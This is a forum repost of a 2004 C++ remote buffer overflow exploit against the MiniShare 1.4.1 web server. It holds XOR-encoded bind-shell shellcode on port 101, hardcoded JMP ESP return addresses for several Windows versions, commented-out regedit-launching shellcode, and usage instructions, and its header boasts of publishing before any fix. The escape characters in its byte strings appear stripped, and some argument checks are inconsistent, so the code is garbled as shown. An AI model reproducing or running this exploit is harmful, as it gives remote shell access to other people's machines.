文章作者:class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
复制内容到剪贴板
代码:
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS MINISHARE
------------------
Homepage - [url]http://minishare.sourceforge.net/[/url]
MiniShare is meant to serve anyone who has the need to share files to anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain a complete HTTP-server software...
--------------
VULNERABILITY
--------------
A simple buffer overflow in the link length, nothing more
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted the same day published, 1 hour before you.
As a nice fuck to NGSS , iDEFENSE and all others private disclosures
homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
lol :->
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] [url]www.kd-team.com[/url] [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"xEB"
"x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
"xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
"xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
"x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
"xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
"x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
"xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
"x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
"x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
"x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
"x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
"xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
"xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
"xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
"xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
"x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
"x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
"xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
"x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
"x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
"x58x68x61x63x6Bx90";
/*
//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English
char scode+[] =
"xEB"
"x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
"xFFxDDx01x6Dx09x64xC4x88x88x88xDBx05xF5x3Cx4ExCDx7CxFAx4ExCD"
"x7DxEDx4ExCDx7ExEFx4ExCDx7FxEDx4ExCDx70xECx4ExCDx71xE1x4ExCD"
"x72xFCx4ExCDx73xA6x4ExCDx74xEDx4ExCDx75xF0x4ExCDx76xEDx4ExCD"
"x77x88xE0x8Dx88x88x88x05xCDx7CxD8x30xE8x75x6ExFFx77x58xE0x89"
"x88x88x88x30xEBx10x6FxFFx77x58x68x61x63x6Bx90";
//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English
char scode+[]=
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG";
*/
static char payload[5000];
char espxp1en[]="x33x55xdcx77"; //JMP ESP - user32.dll - WinXP SP1 English
char esp2k4en[]="xb8x9exe3x77"; //JMP ESP - user32.dll - Win2k SP4 English
char espnt6en[]="xf8x29xf3x77"; //JMP ESP - kernel32.dll - WinNT SP6 English
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=80;
if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, constructing the payload..."<<endl;
Sleep(1000);
sizeA=1787;
sizeB=414-sizeof(scode);
sizeC=10;
sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
memset(payload,0,sizeof(payload));
strcat(payload,"GET ");
for (a=0;a<sizeA;a++){strcat(payload,"x41");}
strcat(payload,target);
for (b=0;b<sizeB;b++){strcat(payload,"x41");}
strcat(payload,scode);
for (c=0;c<sizeC;c++){strcat(payload,"x41");}
strcat(payload," HTTP/1.1rnrn");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_mini.exe Target Ip Portn"<<endl;
cout<<"TARGETS: "<<endl;
cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 80 is default if no port specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ===================================================[v0.1]===="<<endl;
cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ============================================================="<<endl;
cout<<" "<<endl;
} 
